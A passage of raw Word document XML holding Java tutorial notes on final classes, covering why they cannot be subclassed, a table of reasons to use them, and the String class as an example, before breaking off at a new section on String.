          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714EFB3E" w14:textId="77777777" w:rsidR="009C5280" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0977C6" w14:textId="77777777" w:rsidR="009C5280" w:rsidRPr="00CE4B95"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i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C44E9AE" w14:textId="77777777" w:rsidR="009C5280" w:rsidRPr="00CE4B95"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AC590B4" w14:textId="77777777" w:rsidR="009C5280" w:rsidRPr="00CE4B95"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Vehicle</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> v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Vehicle</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584D10B9" w14:textId="77777777" w:rsidR="009C5280" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        v</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u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xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Works fine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F87600D" w14:textId="77777777" w:rsidR="009C5280" w:rsidRPr="00CE4B95"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234A1AB" w14:textId="516471E9" w:rsidR="009C5280" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8169A3" w14:textId="77777777" w:rsidR="009C5280" w:rsidRPr="00CE4B95" w:rsidRDefault="009C5280" w:rsidP="009C5280">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2. You cannot extend it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BE6B74" w14:textId="77777777" w:rsidR="009C5280" w:rsidRPr="00CE4B95" w:rsidRDefault="009C5280" w:rsidP="009C5280">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>If any other class tries to inherit it, the compiler throws an error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493BA554" w14:textId="77777777" w:rsidR="009C5280" w:rsidRPr="00CE4B95"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821672"/>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a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xtend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Vehic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042688D" w14:textId="77777777" w:rsidR="009C5280" w:rsidRPr="00CE4B95"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82167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xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>❌</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Compilation Error: Cannot inherit from final class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601FE1D3" w14:textId="0E0F7FDC" w:rsidR="009C5280" w:rsidRPr="00CE4B95"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821672"/>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35D6F461" w14:textId="77777777" w:rsidR="009C5280" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="009C5280">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="6B4EA312">
          <v:rect id="_x0000_i1083" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1269F52C" w14:textId="77777777" w:rsidR="009C5280" w:rsidRPr="00CE4B95" w:rsidRDefault="009C5280" w:rsidP="009C5280">
      <w:pPr>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Why create a final cla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0"/>
        <w:gridCol w:w="4776"/>
      </w:tblGrid>
      <w:tr w:rsidR="009C5280" w:rsidRPr="00CE4B95" w14:paraId="39041E88" w14:textId="77777777" w:rsidTr="009C5280">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05EF5ADA" w14:textId="77777777" w:rsidR="009C5280" w:rsidRPr="00CE4B95" w:rsidRDefault="009C5280" w:rsidP="009C5280">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Reason</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A7D03B5" w14:textId="77777777" w:rsidR="009C5280" w:rsidRPr="00CE4B95" w:rsidRDefault="009C5280" w:rsidP="009C5280">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009C5280" w:rsidRPr="00CE4B95" w14:paraId="52F2945C" w14:textId="77777777" w:rsidTr="009C5280">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E1410D5" w14:textId="77777777" w:rsidR="009C5280" w:rsidRPr="00CE4B95" w:rsidRDefault="009C5280" w:rsidP="009C5280">
            <w:pPr>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Security</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12D6BBE2" w14:textId="77777777" w:rsidR="009C5280" w:rsidRPr="00CE4B95" w:rsidRDefault="009C5280" w:rsidP="009C5280">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Prevents classes from being modified via inheritance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009C5280" w:rsidRPr="00CE4B95" w14:paraId="3A0C1406" w14:textId="77777777" w:rsidTr="009C5280">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F325D4C" w14:textId="77777777" w:rsidR="009C5280" w:rsidRPr="00CE4B95" w:rsidRDefault="009C5280" w:rsidP="009C5280">
            <w:pPr>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Immutability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A31F837" w14:textId="77777777" w:rsidR="009C5280" w:rsidRPr="00CE4B95" w:rsidRDefault="009C5280" w:rsidP="009C5280">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Helps build immutable classes (like String)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009C5280" w:rsidRPr="00CE4B95" w14:paraId="7843FF9F" w14:textId="77777777" w:rsidTr="009C5280">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C68ECF0" w14:textId="77777777" w:rsidR="009C5280" w:rsidRPr="00CE4B95" w:rsidRDefault="009C5280" w:rsidP="009C5280">
            <w:pPr>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Framework Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6056AD52" w14:textId="77777777" w:rsidR="009C5280" w:rsidRPr="00CE4B95" w:rsidRDefault="009C5280" w:rsidP="009C5280">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Used in APIs to avoid unexpected subclassing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009C5280" w:rsidRPr="00CE4B95" w14:paraId="15843A99" w14:textId="77777777" w:rsidTr="009C5280">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63B278FC" w14:textId="77777777" w:rsidR="009C5280" w:rsidRPr="00CE4B95" w:rsidRDefault="009C5280" w:rsidP="009C5280">
            <w:pPr>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Stable Behavior</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50D8500F" w14:textId="77777777" w:rsidR="009C5280" w:rsidRPr="00CE4B95" w:rsidRDefault="009C5280" w:rsidP="009C5280">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Prevents method overriding and logic changes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="23FFD63D" w14:textId="77777777" w:rsidR="0064347B" w:rsidRPr="00CE4B95" w:rsidRDefault="0064347B" w:rsidP="009C5280">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F489AF8" w14:textId="77777777" w:rsidR="0064347B" w:rsidRPr="00CE4B95" w:rsidRDefault="0064347B" w:rsidP="009C5280">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ED426B9" w14:textId="28CA987C" w:rsidR="009C5280" w:rsidRPr="00CE4B95" w:rsidRDefault="009C5280" w:rsidP="009C5280">
      <w:pPr>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Real-world example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDE38E2" w14:textId="77777777" w:rsidR="009C5280" w:rsidRPr="00CE4B95" w:rsidRDefault="009C5280" w:rsidP="009C5280">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The String class in Java is final:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06225551" w14:textId="77777777" w:rsidR="006263F3" w:rsidRPr="00CE4B95" w:rsidRDefault="006263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731597"/>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E2FADB5" w14:textId="77777777" w:rsidR="006263F3" w:rsidRPr="00CE4B95" w:rsidRDefault="006263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73159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nternal implementation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37023B44" w14:textId="55A1BD3B" w:rsidR="006263F3" w:rsidRPr="00CE4B95" w:rsidRDefault="006263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731597"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486F9E5E" w14:textId="77777777" w:rsidR="009C5280" w:rsidRPr="00CE4B95" w:rsidRDefault="009C5280" w:rsidP="009C5280">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Why? Because String is:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1B4E6B" w14:textId="77777777" w:rsidR="009C5280" w:rsidRPr="00CE4B95" w:rsidRDefault="009C5280">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="134"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Immutable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9C49A5" w14:textId="77777777" w:rsidR="009C5280" w:rsidRPr="00CE4B95" w:rsidRDefault="009C5280">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="134"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Used heavily in JVM internals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C212A3" w14:textId="77777777" w:rsidR="009C5280" w:rsidRPr="00CE4B95" w:rsidRDefault="009C5280">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="134"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Needs guaranteed behavior</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1151CCF0" w14:textId="77777777" w:rsidR="009C5280" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="009C5280">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="2B8427A4">
          <v:rect id="_x0000_i1084" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2FBEE0" w14:textId="77777777" w:rsidR="009C5280" w:rsidRPr="00CE4B95" w:rsidRDefault="009C5280" w:rsidP="009C5280">
      <w:pPr>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What you CANNOT do with a final class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BA46E1" w14:textId="77777777" w:rsidR="009C5280" w:rsidRPr="00CE4B95" w:rsidRDefault="009C5280">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>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Subclass it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593E05B8" w14:textId="77777777" w:rsidR="009C5280" w:rsidRPr="00CE4B95" w:rsidRDefault="009C5280">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>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Override its methods in a child class (since no child class can exist)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6E57D5" w14:textId="77777777" w:rsidR="009C5280" w:rsidRPr="00CE4B95" w:rsidRDefault="009C5280" w:rsidP="006263F3">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">But you </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>can</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132C671D" w14:textId="77777777" w:rsidR="009C5280" w:rsidRPr="00CE4B95" w:rsidRDefault="009C5280">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="136"/>
        </w:numPr>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Instantiate it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297C8A1F" w14:textId="77777777" w:rsidR="009C5280" w:rsidRPr="00CE4B95" w:rsidRDefault="009C5280">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="136"/>
        </w:numPr>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Use its methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CB7EC9" w14:textId="77777777" w:rsidR="009C5280" w:rsidRPr="00CE4B95" w:rsidRDefault="009C5280">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="136"/>
        </w:numPr>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Pass it around like any other class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA01C79" w14:textId="1688554B" w:rsidR="000F5ACC" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="001967B5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="3E030FF7">
          <v:rect id="_x0000_i1085" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8F6EB6" w14:textId="0FAB9F45" w:rsidR="001967B5" w:rsidRPr="00CE4B95" w:rsidRDefault="001967B5" w:rsidP="001967B5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc196307497"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is String?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="43F3A4E2" w14:textId="454AA517" w:rsidR="000A485D" w:rsidRPr="00CE4B95" w:rsidRDefault="000A485D" w:rsidP="006912E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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What is String in Java?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7509566D" w14:textId="77777777" w:rsidR="000A485D" w:rsidRPr="00CE4B95" w:rsidRDefault="000A485D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="106"/>
